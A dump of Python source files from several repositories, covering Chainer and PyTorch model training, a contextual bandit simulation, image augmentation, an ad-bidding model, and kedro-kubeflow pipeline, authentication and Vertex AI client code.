train_mini_batch_loader, \ train_args.training_params.batch_size, \ shuffle=train_args.shuffle) val_batch_size = 1 val_it = iterator( \ test_mini_batch_loader, \ val_batch_size, repeat=False, shuffle=False) return train_it, val_it, train_mini_batch_loader.__len__() def prepare_updater(self, train_it, optimizer): if self.args.training_params.updater_type=='standerd': return training.StandardUpdater( \ train_it, optimizer, device=self.args.gpu) elif self.args.training_params.updater_type=='parallel': return training.ParallelUpdater( \ train_it, optimizer, devices={'main': 1, 'second': 0}) def run_trainer(self): # load model model, model_for_eval = self.prepare_model(self.args) print("---set model----------") # Setup optimizer optimizer = self.prepare_optimizer(model) print("---set optimzer----------") # load data train_it, val_it, train_data_length = self.prepare_dataset() print("---set data----------") updater = self.prepare_updater(train_it, optimizer) print("---set updater----------") evaluator_interval = self.args.training_params.report_epoch, 'epoch' snapshot_interval = self.args.training_params.snapshot_epoch, 'epoch' log_interval = self.args.training_params.report_epoch, 'epoch' trainer = training.Trainer( updater, \ (self.args.training_params.epoch, 'epoch'), out=self.args.output_path) trainer.extend( \ extensions.Evaluator(val_it, model_for_eval, device=self.args.gpu), \ trigger=evaluator_interval) trainer.extend(extensions.dump_graph('main/loss')) trainer.extend(extensions.snapshot(), trigger=snapshot_interval) trainer.extend(extensions.snapshot_object( \ model, 'model_iter_{.updater.iteration}'), trigger=snapshot_interval) if self.args.training_params.optimizer!='Adam' \ and self.args.training_params.optimizer!='AdaDelta': trainer.extend(extensions.ExponentialShift( \ 'lr', self.args.training_params.decay_factor), \ trigger=(self.args.training_params.decay_epoch, 'epoch')) trainer.extend(extensions.observe_lr(), trigger=log_interval) trainer.extend(extensions.LogReport(trigger=log_interval)) trainer.extend(extensions.PrintReport([ \ 'epoch', 'iteration', 'main/loss', 'validation/main/loss', \ 'main/accuracy', 'validation/main/accuracy', \ ]), trigger=log_interval) trainer.extend(extensions.ProgressBar(update_interval=1)) print("---set trainer----------") if os.path.exists(self.args.resume): print('resume trainer:{}'.format(self.args.resume)) # Resume from a snapshot serializers.load_npz(self.args.resume, trainer) trainer.run() ```
{ "source": "0shimax/chainer-PRNN", "score": 3 }
#### File: 0shimax/chainer-PRNN/persistent_memory_function.py ```python import numpy import chainer from chainer import function_node class PersistentMemoryFunction(function_node.FunctionNode): def forward(self, inputs): self.retain_inputs((0, 1)) x, memory = inputs batch = len(x) if (isinstance(x, numpy.ndarray) and not (x.flags.c_contiguous or x.flags.f_contiguous) and 1 in x.shape): x = numpy.ascontiguousarray(x) y = x.dot(memory).astype(x.dtype, copy=False) # self.retain_outputs((0,)) return y def backward(self, indexes, grad_outputs): x, memory = self.get_retained_inputs() gy, = grad_outputs ret = [] gx, = MemoryGradData().apply((memory, gy)) ret.append(chainer.functions.cast(gx, x.dtype)) gm, = MemoryGradWeight().apply((x, gy)) ret.append(chainer.functions.cast(gm, memory.dtype)) return ret class MemoryGradData(function_node.FunctionNode): def forward(self, inputs): self.retain_inputs((0, 1)) memory, gy = inputs if (isinstance(gy, numpy.ndarray) and not (gy.flags.c_contiguous or gy.flags.f_contiguous) and 1 in gy.shape): gy = numpy.ascontiguousarray(gy) gx = gy.dot(memory).astype(gy.dtype, copy=False) return gx, def backward(self, indexes, grad_outputs): memory, gy = self.get_retained_inputs() ggx, = grad_outputs ret = [] gm, = MemoryGradWeight().apply((ggx, gy)) ret.append(chainer.functions.cast(gm, memory.dtype)) ggy = persistent_memory(ggx, memory) ret.append(chainer.functions.cast(ggy, gy.dtype)) return ret class MemoryGradWeight(function_node.FunctionNode): def forward(self, inputs): self.retain_inputs((0, 1)) x, gy = inputs if (isinstance(gy, numpy.ndarray) and not (gy.flags.c_contiguous or gy.flags.f_contiguous) and 1 in gy.shape): gy = numpy.ascontiguousarray(gy) gW = gy.T.dot(x).astype(gy.dtype, copy=False) return gW, def backward(self, indexes, grad_outputs): x, gy = self.get_retained_inputs() ggW, = grad_outputs ret = [] gx, = MemoryGradData().apply((ggW, gy)) ret.append(chainer.functions.cast(gx, x.dtype)) ggy = persistent_memory(x, ggW) ret.append(chainer.functions.cast(ggy, gy.dtype)) return ret def persistent_memory(x, memory): x = x.reshape(len(x), -1) args = x, memory y, = PersistentMemoryFunction().apply(args) return y ``` #### File: 0shimax/chainer-PRNN/persistent_memory_link.py ```python import functools import operator from chainer import initializers from chainer import link from chainer import variable import chainer.functions as F from persistent_memory_function import persistent_memory class PersistentMemory(link.Chain): def __init__(self, in_size, slot_size, memory_size, initialW=None): """ in_size: hidden_state h_size """ super().__init__() self.slot_size = slot_size self.memory_size = memory_size with self.init_scope(): W_initializer = initializers._get_initializer(initialW) self.memory = variable.Parameter(W_initializer) self.projection_matrix = variable.Parameter(W_initializer) def _initialize_params(self, in_size): self.memory.initialize((self.memory_size, self.slot_size)) self.projection_matrix.initialize((in_size, self.memory_size)) def calculate_memory_weight(self, in_size, hidden_state): # print("hidden_state", hidden_state) DM = F.matmul(self.projection_matrix, self.memory) # (in_size, slot_size) # print("DM----", DM) sim = F.matmul(hidden_state, DM) # (batch_size, slot_size) # print("sim----", sim) n_batch, n_slot = sim.shape normed_hidden = F.reshape(F.batch_l2_norm_squared(hidden_state), (-1, 1)) sim = F.exp(F.log(1+sim) - F.log(1+F.tile(normed_hidden, (1, n_slot)))) # sim /= F.tile(normed_hidden, (1, n_slot)) # (batch_size, slot_size)/(batch_size,) sim = F.exp(F.log(1+sim) - F.log(1+F.tile(F.sum(DM*DM, axis=0), (n_batch, 1)))) # sim /= F.tile( # F.sum(DM*DM, axis=0), (n_batch, 1)) # (batch_size, slot_size)/(slot_size,) return F.softmax(sim) # (batch_size, slot_size) def __call__(self, x): in_size = None if self.memory.data is None: in_size = functools.reduce(operator.mul, x.shape[1:], 1) self._initialize_params(in_size) self.weight = self.calculate_memory_weight(in_size, x) n_batch, n_slot = self.weight.shape n_memory, _ = self.memory.shape # (batch_size, slot_size)*(memory_size, slot_size) wm = F.reshape( F.tile(self.weight, (1, n_memory)), (-1, n_memory, n_slot)) \ * F.tile(self.memory, (n_batch, 1, 1)) return F.sum(wm, axis=2) ```
{ "source": "0shimax/contextual-bandit", "score": 3 }
#### File: 0shimax/contextual-bandit/contextual_multi_arms_bandits.py ```python import numpy as np from numpy.random import uniform, randint np.random.seed(555) class Arm: def __init__(self, feature_dim, content_id, alpha=0.01): self.content_id = content_id self.alpha = alpha # regularization parameter self.norm_mean = np.zeros((1, feature_dim)) # Covariance matrix: # Store diagonal components only to increase memory efficiency self.cov_matrix = np.ones((1, feature_dim)) self.win_rate = 0 self.win = 0 self.lose = 0 def update(self, features, is_click): features = features.reshape((1,features.shape[0])) self.cov_matrix += np.diag(features.T.dot(features)) self.norm_mean += is_click*features if is_click: self.win+=1 else: self.lose+=1 self.win_rate = self.win/(self.win + self.lose) def predict(self, features): features = features.reshape((features.shape[0],1)) # Since the covariance matrix preserves only the diagonal components, # it suffices to take the inverse matrix theta = (1/self.cov_matrix)*self.norm_mean # [1, feature_dim] # Again, the inverse matrix of the covariance matrix # is ​​computed by taking reciprocal return theta.dot(features) + \ self.alpha*np.sqrt((features.T*(1/self.cov_matrix)).dot(features)) def print_result(self): print('content_id:{}, total_num:{}, win_rate:{}'.format(\ self.content_id, self.win+self.lose, self.win_rate)) class Viewer: def __init__(self, gender='man'): self.gender = gender def view(self, content_id): if self.gender == 'man': # Men are easy to click on ads with id 5 or less if content_id<6: return True if uniform(0, 1.0) > 0.3 else False else: return True if uniform(0, 1.0) > 0.7 else False else: # Women are easy to click on ads with id 6 or higher if content_id > 5: return True if uniform(0, 1.0) > 0.3 else False else: return True if uniform(0, 1.0) > 0.7 else False class Rulet: def __init__(self, feature_dim): self.arms = {} self.feature_dim = feature_dim def generate_arm(self, content_id): if content_id not in self.arms: self.arms[content_id] = Arm(self.feature_dim, content_id) return self.arms[content_id] def generate_features(self): viewer = Viewer(self.generate_gender()) features = np.array([1,0]) if viewer.gender=='man' else np.array([0,1]) content_id = self.generate_content() return features, viewer.view(content_id), self.generate_arm(content_id) def generate_content(self): return randint(1, 10) def generate_gender(self): return 'man' if uniform(0, 1.0) > 0.5 else 'women' if __name__=='__main__': '''Context is for men and women only Men are easy to click on ads with id 5 or less Women are easy to click on ads with id 6 or higher ''' alpha = 0.0001 # regularization parameter feature_dim = 2 num_of_views = 10000 rulet = Rulet(feature_dim) for step in range(num_of_views): features, is_clicked, arm = rulet.generate_features() arm.update(features, is_clicked) # Confirmation of prediction accuracy when the number of data is small if step<2000: arm.print_result() print('print result======') for content_id, arm in rulet.arms.items(): arm.print_result() print('Click rate when men browse:' + str(arm.predict(np.array([1,0]))) ) print('Click rate when women browse:'+ str(arm.predict(np.array([0,1]))) ) ```
{ "source": "0shimax/DL-vision", "score": 3 }
#### File: common/image_processor/mini_batch_loader.py ```python import os, sys sys.path.append('./src/common/image_processor') import chainer import cv2 import numpy as np from contextlib import ExitStack import numbers from image_normalizer import ImageNormalizer class DatasetPreProcessor(chainer.dataset.DatasetMixin): def __init__(self, args): """args type is EasyDict class """ self.args = args self.gray = args.converse_gray self.image_normalizer = ImageNormalizer() self.pairs = self.load_pairs() self.counter = 0 self.image_size_in_batch = [None, None] # height, width def __len__(self): return len(self.pairs) def __init_batch_counter(self): if self.args.train and self.counter==self.args.training_params.batch_size: self.counter = 0 self.image_size_in_batch = [None, None] def __set_image_size_in_batch(self, image): if self.counter==1: resized_h, resized_w = image.shape[:2] self.image_size_in_batch = [resized_h, resized_w] def get_example(self, index): self.counter += 1 if self.args.debug_mode: if self.counter>15: assert False, 'stop test' image, label = self.pairs[index] # gray transform if converse_gray is True image = self.color_trancefer(image) h, w, ch = image.shape if image is None: raise RuntimeError("invalid image: {}".format(path)) # resizing image if self.args.do_resize: if self.counter>1: # augmentas is ordered w,h in resize method of openCV scale = self.image_size_in_batch[1]/w, self.image_size_in_batch[0]/h image= self.resize_image(image, scale) else: image= self.resize_image(image) elif self.args.crop_params.flag: image = self.crop_image(image) # print('resizing done-------------') # augmentat image if self.args.aug_params.do_augment: image = self.augment_image(image) # store image size # because dimension must be equeal per batch self.__set_image_size_in_batch(image) # print('augmentation done-------------') # image normalize image = getattr(self.image_normalizer, \ self.args.im_norm_type.method)(image, self.args.im_norm_type.opts) # print('normalization done-------------') if self.args.debug_mode: cv2.imshow('image', image) cv2.waitKey(0) cv2.destroyAllWindows() print(image.shape) print('label:', label) # transpose for chainer image = image.transpose(2, 0, 1) # initialize batch counter self.__init_batch_counter() return image.astype(np.float32), np.array(label, dtype=np.int32) def load_pairs(self): image_label_pairs = [] for image, label in self.image_label_pair_generator(): image_label_pairs.append((image, label)) return image_label_pairs def image_label_pair_generator(self): import pickle def __unpickle(file_name): with open(file_name, 'rb') as f_cifar10: pairs = pickle.load(f_cifar10, encoding='latin-1') return pairs pair = __unpickle(self.args.image_pointer_path) for image, label in zip(pair["data"], pair['labels']): yield image.reshape((3,32,32)).transpose(1,2,0), label def color_trancefer(self, image): h, w, _ = image.shape if self.args.converse_gray: image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1)) # elif self.yuv: # image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb).astype(np.float32) else: image = image.astype(np.float32) return image def augment_image(self, image): if self.args.aug_params.params.do_scale and self.counter==1: image = self.scaling(image) if self.args.aug_params.params.do_flip: image = self.flip(image) if self.args.aug_params.params.change_britghtness: image = self.random_brightness(image) if self.args.aug_params.params.change_contrast: image = self.random_contrast(image) if self.args.aug_params.params.do_rotate: image = self.rotate_image(image) if self.args.aug_params.params.do_shift: image = self.shift_image(image) return image def resize_image(self, image, scale=None): xh, xw = image.shape[:2] if scale is None: # if scale is not difinded, calculate scale as closest multiple number. scale = float(xh)/(xh//self.args.multiple)/self.args.multiple #float(xw)/(xw//self.args.multiple)/self.args.multiple, scale = scale, scale elif isinstance(scale, numbers.Number): scale = scale, scale elif isinstance(scale, tuple) and len(scale)>2: raise InvalidArgumentError new_sz = (int(xw*scale[0])+1, int(xh*scale[1])+1) # specification of opencv, argments is recepted (w, h) # image = image[::inv_resize_scale,::inv_resize_scale] image = cv2.resize(image, new_sz) xh, xw = image.shape[:2] m0, m1 = xh % self.args.multiple, xw % self.args.multiple d0, d1 = np.random.randint(m0+1), np.random.randint(m1+1) image = image[d0:(image.shape[0] - m0 + d0), d1:(image.shape[1] - m1 + d1)] if len(image.shape)==2: return image.reshape((image.shape[0], image.shape[1], 1)) else: return image def flip(self, image): do_flip_xy = np.random.randint(0, 2) do_flip_x = np.random.randint(0, 2) do_flip_y = np.random.randint(0, 2) if do_flip_xy: # Transpose X and Y axis image = image[::-1, ::-1, :] elif do_flip_x: # Flip along Y-axis image = image[::-1, :, :] elif do_flip_y: # Flip along X-axis image = image[:, ::-1, :] return image def scaling(self, image): do_scale = np.random.randint(0, 2) if do_scale: scale = self.args.aug_params.params.scale[ \ np.random.randint(0,len(self.args.aug_params.params.scale))] return self.resize_image(image, scale) else: return image def random_brightness(self, image, max_delta=63, seed=None): brightness_flag = np.random.randint(0, 2) if brightness_flag: delta = np.random.uniform(-max_delta, max_delta) return image + delta else: return image def random_contrast(self, image, lower=0.2, upper=1.8, seed=None): contrast_flag = np.random.randint(0, 2) if contrast_flag: factor = np.random.uniform(-lower, upper) im_mean = image.mean(axis=2) return ((image.transpose(2, 0, 1) - im_mean)*factor + im_mean).transpose(1,2,0).astype(np.uint8) else: return image def shift_image(self, image): do_shift_xy = np.random.randint(0, 2) do_shift_x = np.random.randint(0, 2) do_shift_y = np.random.randint(0, 2) if do_shift_xy: lr_shift = self.args.aug_params.params.lr_shift[ \ np.random.randint(0,len(self.args.aug_params.params.lr_shift))] ud_shift = self.args.aug_params.params.ud_shift[ \ np.random.randint(0,len(self.args.aug_params.params.ud_shift))] elif do_shift_y: lr_shift = 0 ud_shift = self.args.aug_params.params.ud_shift[ \ np.random.randint(0,len(self.args.aug_params.params.ud_shift))] elif do_shift_x: lr_shift = self.args.aug_params.params.lr_shift[ \ np.random.randint(0,len(self.args.aug_params.params.lr_shift))] ud_shift = 0 if do_shift_xy or do_shift_y or do_shift_y: h, w, ch = image.shape affine_matrix = np.float32([[1,0,lr_shift],[0,1,ud_shift]]) # 横、縦 image = cv2.warpAffine(image, affine_matrix, (w,h)) return self.__reshpe_channel(image, (h,w,ch)) else: return image def rotate_image(self, image): do_rotate = np.random.randint(0, 2) if do_rotate: h, w, ch = image.shape rotation_angle = self.args.aug_params.params.rotation_angle[ \ np.random.randint(0,len(self.args.aug_params.params.rotation_angle))] affine_matrix = cv2.getRotationMatrix2D((h/2, w/2), rotation_angle, 1) image = cv2.warpAffine(image, affine_matrix, (w,h)) return self.__reshpe_channel(image, (h,w,ch)) else: return image def crop_image(self, image): h, w, ch = image.shape top = int((w-self.args.crop_params.size)/2) left = int((h-self.args.crop_params.size)/2) return image[left:left+self.args.crop_params.size,top:top+self.args.crop_params.size,:] def __reshpe_channel(self, image, im_shape ): if len(image.shape)==2: return image.reshape(im_shape) else: return image ```
{ "source": "0shimax/Easy-Over-Complete-Distribution", "score": 3 }
#### File: src/feature/data_loader.py ```python from pathlib import Path import numpy from skimage import io import torch from torchvision import datasets, transforms from torch.utils.data import Dataset from PIL import Image from feature.utils import ImageTransform class WBCDataset(Dataset): def __init__(self, image_labels, root_dir, subset="Dataset1", transform=ImageTransform()): super().__init__() self.image_labels = image_labels self.root_dir = root_dir self.subset = subset self.transform = transform def __len__(self): return len(self.image_labels) def __getitem__(self, idx): img_name, label = self.image_labels[idx] image_path = Path(self.root_dir, self.subset, "{0:03}.bmp".format(img_name)) image = io.imread(image_path) if self.transform: image = Image.fromarray(numpy.uint8(image)) image = self.transform(image) return image, torch.LongTensor([label]) def loader(dataset, batch_size, shuffle=True): loader = torch.utils.data.DataLoader( dataset, batch_size=batch_size, shuffle=shuffle, num_workers=4) return loader ``` #### File: model/visualizer/lime_visualizer.py ```python from pathlib import Path import matplotlib.pyplot as plt import numpy as np import torch from skimage.segmentation import mark_boundaries from lime import lime_image explainer = lime_image.LimeImageExplainer() def normalize(x): return np.array((x - np.min(x)) / (np.max(x) - np.min(x))) def visualize(args, image, predict_fn, img_idx, label_id, gt_id, num_samples=1000): data = image.transpose(2,1).transpose(3,2).squeeze(0).numpy() explanation = explainer.explain_instance(data, predict_fn, top_labels=5, hide_color=0, num_samples=num_samples) temp, mask = explanation.get_image_and_mask(int(gt_id), positive_only=False, num_features=1000, hide_rest=True) out = mark_boundaries(temp / 2 + 0.5, mask) out = normalize(out) plt.imsave(Path(args.out_dir, "visualized", "testimg{}_gt{}_pred{}.jpeg".format(img_idx, gt_id, label_id)), out) plt.imsave(Path(args.out_dir, "visualized", "testimg{}.jpeg".format(img_idx)), normalize(data)) ```
{ "source": "0shimax/effective-budget-management", "score": 3 }
#### File: src/model/bid.py ```python from dataclasses import dataclass import math import numpy from scipy.optimize import curve_fit from model.sub_funcs import imp_for_bid_price, win_rate, calculate_mprice @dataclass class bid(object): n_of_time_slot: int = 0 current_time_slot: int = 0 average_market_price: float = 0.0 ideal_spend: dict = {} current_spend: dict = {} # win-rate vs budget distribution params bid_pram_k_1: float = 1e-3 bid_pram_k_2: float = 1e-3 bid_pram_lambda: float = 1e-3 # budget total_budget: float = 0.0 slot_budget: dict = {} pctr_threshold: dict = {} # power-law distribution params dist_param_c: float = 1e-3 dist_param_alpha: float = 1e-3 def set_market_price( self, pctrs: numpy.ndarray, mprices: numpy.ndarray, threshold: float ) -> None: self.average_market_price = calculate_mprice(pctrs, mprices, threshold) def fit_imp_bid_func(self, n_of_imps: numpy.ndarray, bid_prices: numpy.ndarray): popt, _ = curve_fit(imp_for_bid_price, n_of_imps, bid_prices) self.dist_param_c, self.dist_param_alpha = popt def fit_win_rate_func(self, win_rates: numpy.ndarray, bid_prices: numpy.ndarray): popt, _ = curve_fit(win_rate, win_rates, bid_prices) self.bid_pram_k_1, self.bid_pram_k_2 = popt def bid_price(self) -> float: tmp = self.bid_pram_lambda * self.bid_pram_k_2 ** 2 tmp += self.pctr() * self.bid_pram_k_1 * self.bid_pram_k_2 tmp /= self.bid_pram_lambda * self.bid_pram_k_1 ** 2 tmp = math.sqrt(tmp) tmp -= self.bid_pram_k_2 / self.bid_pram_k_1 return self.adjustment_by_sp() * tmp def pctr(self) -> float: pass def adjustment_by_sp(self) -> float: return ( self.ideal_spend[self.current_time_slot] / self.current_spend[self.current_time_slot] ) def update_budget_for_each_slot(self) -> None: slot_budgets = self.slot_budget.values() tmp = self.total_budget - sum( [self.current_spend[i] for i in range(1, self.current_time_slot)] ) tmp *= self.slot_budget[self.current_time_slot] tmp /= sum(slot_budgets) self.slot_budget[self.current_time_slot] = tmp def update_pctr_threshold(self) -> None: tmp = 1.0 - self.dist_param_alpha tmp /= ( self.dist_param_c * self.average_market_price * self.slot_budget[self.current_time_slot] ) self.pctr_threshold[ self.current_time_slot ] = 1.0 - self.dist_param_alpha * math.sqrt(1 - tmp) ```
{ "source": "0shimax/GBDT2DNN", "score": 3 }
#### File: src/data/data_loader.py ```python from pathlib import Path import torch from torch.utils.data import Dataset class MyDataset(Dataset): def __init__(self, features, labels, gbdt_model, transform=None, is_train=False): super().__init__() self.transform = transform self.is_train = is_train self.features = features self.labels = labels self.gbdt_model = gbdt_model def __len__(self): return len(self.features) def __getitem__(self, idx): feature = self.features[idx] label = self.labels[idx] feature_for_dnn = self.gbdt_model.apply(feature.reshape(1, -1)) return torch.LongTensor([feature_for_dnn]), torch.LongTensor([label]) def loader(dataset, batch_size, shuffle=True): loader = torch.utils.data.DataLoader( dataset, batch_size=batch_size, shuffle=shuffle, num_workers=4) return loader ```
{ "source": "0shimax/kedro-kubeflow", "score": 2 }
#### File: kedro-kubeflow/kedro_kubeflow/auth.py ```python import logging import os import re from urllib.parse import urlsplit, urlunsplit import requests IAP_CLIENT_ID = "IAP_CLIENT_ID" DEX_USERNAME = "DEX_USERNAME" DEX_PASSWORD = "<PASSWORD>" class AuthHandler(object): log = logging.getLogger(__name__) def obtain_id_token(self): from google.auth.exceptions import DefaultCredentialsError from google.auth.transport.requests import Request from google.oauth2 import id_token client_id = os.environ.get(IAP_CLIENT_ID, None) jwt_token = None if not client_id: self.log.debug( "No IAP_CLIENT_ID provided, skipping custom IAP authentication" ) return jwt_token try: self.log.debug("Attempt to get IAP token for %s." + client_id) jwt_token = id_token.fetch_id_token(Request(), client_id) self.log.info("Obtained JWT token for IAP proxy authentication.") except DefaultCredentialsError as ex: self.log.warning( str(ex) + ( " Note that this authentication method does not work with default" " credentials obtained via 'gcloud auth application-default login'" " command. Refer to documentation on how to configure service account" " locally" " (https://cloud.google.com/docs/authentication/production#manually)" ) ) except Exception as e: self.log.error("Failed to obtain IAP access token. " + str(e)) finally: return jwt_token def obtain_dex_authservice_session(self, kfp_api): if DEX_USERNAME not in os.environ or DEX_PASSWORD not in os.environ: self.log.debug( "Skipping DEX authentication due to missing env variables" ) return None s = requests.Session() r = s.get(kfp_api) form_relative_url = re.search( '/dex/auth/local\\?req=([^"]*)', r.text ).group(0) kfp_url_parts = urlsplit(kfp_api) form_absolute_url = urlunsplit( [ kfp_url_parts.scheme, kfp_url_parts.netloc, form_relative_url, None, None, ] ) headers = { "Content-Type": "application/x-www-form-urlencoded", } data = { "login": os.environ[DEX_USERNAME], "password": <PASSWORD>[DEX_PASSWORD], } s.post(form_absolute_url, headers=headers, data=data) return s.cookies.get_dict()["authservice_session"] ``` #### File: kedro_kubeflow/generators/pod_per_node_pipeline_generator.py ```python import contextlib import logging from typing import Dict, Set import kubernetes.client as k8s from kedro.pipeline.node import Node from kfp import dsl from kfp.compiler._k8s_helper import sanitize_k8s_name from ..utils import clean_name, is_mlflow_enabled from .utils import ( create_arguments_from_parameters, create_command_using_params_dumper, create_container_environment, maybe_add_params, ) class PodPerNodePipelineGenerator(object): log = logging.getLogger(__name__) def __init__(self, config, project_name, context): self.project_name = project_name self.context = context dsl.ContainerOp._DISABLE_REUSABLE_COMPONENT_WARNING = True self.run_config = config.run_config self.catalog = context.config_loader.get("catalog*") def configure_max_cache_staleness(self, kfp_ops): if self.run_config.max_cache_staleness not in [None, ""]: for _, op in kfp_ops.items(): op.execution_options.caching_strategy.max_cache_staleness = ( self.run_config.max_cache_staleness ) def generate_pipeline(self, pipeline, image, image_pull_policy): @dsl.pipeline( name=self.project_name, description=self.run_config.description, ) @maybe_add_params(self.context.params) def convert_kedro_pipeline_to_kfp() -> None: """Convert from a Kedro pipeline into a kfp container graph.""" dsl.get_pipeline_conf().set_ttl_seconds_after_finished( self.run_config.ttl ) node_dependencies = self.context.pipelines.get( pipeline ).node_dependencies with self._create_pipeline_exit_handler( pipeline, image, image_pull_policy ): kfp_ops = self._build_kfp_ops( pipeline, node_dependencies, image, image_pull_policy ) self.configure_max_cache_staleness(kfp_ops) for node, dependencies in node_dependencies.items(): for dependency in dependencies: kfp_ops[node.name].after(kfp_ops[dependency.name]) return convert_kedro_pipeline_to_kfp def _create_pipeline_exit_handler( self, pipeline, image, image_pull_policy ): enable_volume_cleaning = ( self.run_config.volume is not None and not self.run_config.volume.keep ) if not enable_volume_cleaning and not self.run_config.on_exit_pipeline: return contextlib.nullcontext() commands = [] if enable_volume_cleaning: commands.append( "kedro kubeflow delete-pipeline-volume " "{{workflow.name}}-" + sanitize_k8s_name(f"{pipeline}-data-volume") ) if self.run_config.on_exit_pipeline: commands.append( "kedro run " "--config config.yaml " f"--env {self.context.env} " f"--pipeline {self.run_config.on_exit_pipeline}" ) exit_container_op = dsl.ContainerOp( name="on-exit", image=image, command=create_command_using_params_dumper(";".join(commands)), arguments=create_arguments_from_parameters( self.context.params.keys() ) + [ "status", "{{workflow.status}}", "failures", "{{workflow.failures}}", ], container_kwargs={"env": create_container_environment()}, ) if self.run_config.max_cache_staleness not in [None, ""]: exit_container_op.execution_options.caching_strategy.max_cache_staleness = ( self.run_config.max_cache_staleness ) return dsl.ExitHandler( self._customize_op(exit_container_op, image_pull_policy) ) def _build_kfp_ops( self, pipeline, node_dependencies: Dict[Node, Set[Node]], image, image_pull_policy, ) -> Dict[str, dsl.ContainerOp]: """Build kfp container graph from Kedro node dependencies.""" kfp_ops = {} node_volumes = ( self._setup_volumes( f"{pipeline}-data-volume", image, image_pull_policy ) if self.run_config.volume is not None else {} ) nodes_env = create_container_environment() if is_mlflow_enabled(): kfp_ops["mlflow-start-run"] = self._customize_op( dsl.ContainerOp( name="mlflow-start-run", image=image, command=["kedro"], arguments=[ "kubeflow", "--env", self.context.env, "mlflow-start", dsl.RUN_ID_PLACEHOLDER, ], container_kwargs={"env": nodes_env}, file_outputs={"mlflow_run_id": "/tmp/mlflow_run_id"}, ), image_pull_policy, ) nodes_env.append( k8s.V1EnvVar( name="MLFLOW_RUN_ID", value=kfp_ops["mlflow-start-run"].output, ) ) for node in node_dependencies: name = clean_name(node.name) kwargs = {"env": nodes_env} if self.run_config.resources.is_set_for(node.name): kwargs["resources"] = k8s.V1ResourceRequirements( limits=self.run_config.resources.get_for(node.name), requests=self.run_config.resources.get_for(node.name), ) kfp_ops[node.name] = self._customize_op( dsl.ContainerOp( name=name, image=image, command=create_command_using_params_dumper( "kedro " "run " f"--env {self.context.env} " f"--pipeline {pipeline} " f"--node {node.name} " f"--config config.yaml" ), arguments=create_arguments_from_parameters( self.context.params.keys() ), pvolumes=node_volumes, container_kwargs=kwargs, file_outputs={ output: "/home/kedro/" + self.catalog[output]["filepath"] for output in node.outputs if output in self.catalog and "filepath" in self.catalog[output] and self.run_config.store_kedro_outputs_as_kfp_artifacts }, ), image_pull_policy, ) return kfp_ops def _customize_op(self, op, image_pull_policy): op.container.set_image_pull_policy(image_pull_policy) if self.run_config.volume and self.run_config.volume.owner is not None: op.container.set_security_context( k8s.V1SecurityContext(run_as_user=self.run_config.volume.owner) ) return op def _setup_volumes(self, volume_name, image, image_pull_policy): vop = dsl.VolumeOp( name="data-volume-create", resource_name=volume_name, size=self.run_config.volume.size, modes=self.run_config.volume.access_modes, storage_class=self.run_config.volume.storageclass, ) if self.run_config.max_cache_staleness not in [None, ""]: vop.add_pod_annotation( "pipelines.kubeflow.org/max_cache_staleness", self.run_config.max_cache_staleness, ) if self.run_config.volume.skip_init: return {"/home/kedro/data": vop.volume} else: volume_init = self._customize_op( dsl.ContainerOp( name="data-volume-init", image=image, command=["sh", "-c"], arguments=[ " ".join( [ "cp", "--verbose", "-r", "/home/kedro/data/*", "/home/kedro/datavolume", ] ) ], pvolumes={"/home/kedro/datavolume": vop.volume}, ), image_pull_policy, ) return {"/home/kedro/data": volume_init.pvolume} ``` #### File: kedro_kubeflow/vertex_ai/client.py ```python import json import logging import os from tempfile import NamedTemporaryFile from google.cloud.scheduler_v1.services.cloud_scheduler import ( CloudSchedulerClient, ) from kfp.v2 import compiler from kfp.v2.google.client import AIPlatformClient from tabulate import tabulate from .generator import PipelineGenerator class VertexAIPipelinesClient: """ Client for Vertex AI Pipelines. """ log = logging.getLogger(__name__) def __init__(self, config, project_name, context): self.generator = PipelineGenerator(config, project_name, context) self.api_client = AIPlatformClient( project_id=config.project_id, region=config.region ) self.cloud_scheduler_client = CloudSchedulerClient() self.location = ( f"projects/{config.project_id}/locations/{config.region}" ) self.run_config = config.run_config def list_pipelines(self): """ List all the jobs (current and historical) on Vertex AI Pipelines :return: """ pipelines = self.api_client.list_jobs()["pipelineJobs"] return tabulate( map(lambda x: [x.get("displayName"), x["name"]], pipelines), headers=["Name", "ID"], ) def run_once( self, pipeline, image, experiment_name, run_name, wait=False, image_pull_policy="IfNotPresent", experiment_namespace=None, ): """ Runs the pipeline in Vertex AI Pipelines :param pipeline: :param image: :param experiment_name: :param run_name: :param wait: :param image_pull_policy: :return: """ with NamedTemporaryFile( mode="rt", prefix="kedro-kubeflow", suffix=".json" ) as spec_output: self.compile( pipeline, image, output=spec_output.name, image_pull_policy=image_pull_policy, ) run = self.api_client.create_run_from_job_spec( service_account=os.getenv("SERVICE_ACCOUNT"), job_spec_path=spec_output.name, job_id=run_name, pipeline_root=f"gs://{self.run_config.root}", parameter_values={}, enable_caching=False, network=self.run_config.vertex_ai_networking.vpc, ) self.log.info("Run created %s", str(run)) return run def compile( self, pipeline, image, output, image_pull_policy="IfNotPresent", ): """ Creates json file in given local output path :param pipeline: :param image: :param output: :param image_pull_policy: :return: """ token = os.getenv("MLFLOW_TRACKING_TOKEN") pipeline_func = self.generator.generate_pipeline( pipeline, image, image_pull_policy, token ) compiler.Compiler().compile( pipeline_func=pipeline_func, package_path=output, ) self.log.info( "Generated pipeline definition was saved to %s", str(output) ) def upload(self, pipeline, image, image_pull_policy="IfNotPresent"): """ Upload is not supported by Vertex AI Pipelines :param pipeline: :param image: :param image_pull_policy: :return: """ raise NotImplementedError("Upload is not supported for VertexAI") def _cleanup_old_schedule(self, pipeline_name): """ Removes old jobs scheduled for given pipeline name """ for job in self.cloud_scheduler_client.list_jobs(parent=self.location): if "jobs/pipeline_pipeline" not in job.name: continue job_pipeline_name = json.loads(job.http_target.body)[ "pipelineSpec" ]["pipelineInfo"]["name"] if job_pipeline_name == pipeline_name: self.log.info( "Found existing schedule for the pipeline at %s, deleting...", job.schedule, ) self.cloud_scheduler_client.delete_job(name=job.name) def schedule( self, pipeline, experiment_name, experiment_namespace, cron_expression, image_pull_policy="IfNotPresent", ): """ Schedule pipeline to Vertex AI with given cron expression :param pipeline: :param experiment_name: :param experiment_namespace: :param cron_expression: :param image_pull_policy: :return: """ self._cleanup_old_schedule(self.generator.get_pipeline_name()) with NamedTemporaryFile( mode="rt", prefix="kedro-kubeflow", suffix=".json" ) as spec_output: self.compile( pipeline, self.run_config.image, output=spec_output.name, image_pull_policy=image_pull_policy, ) self.api_client.create_schedule_from_job_spec( 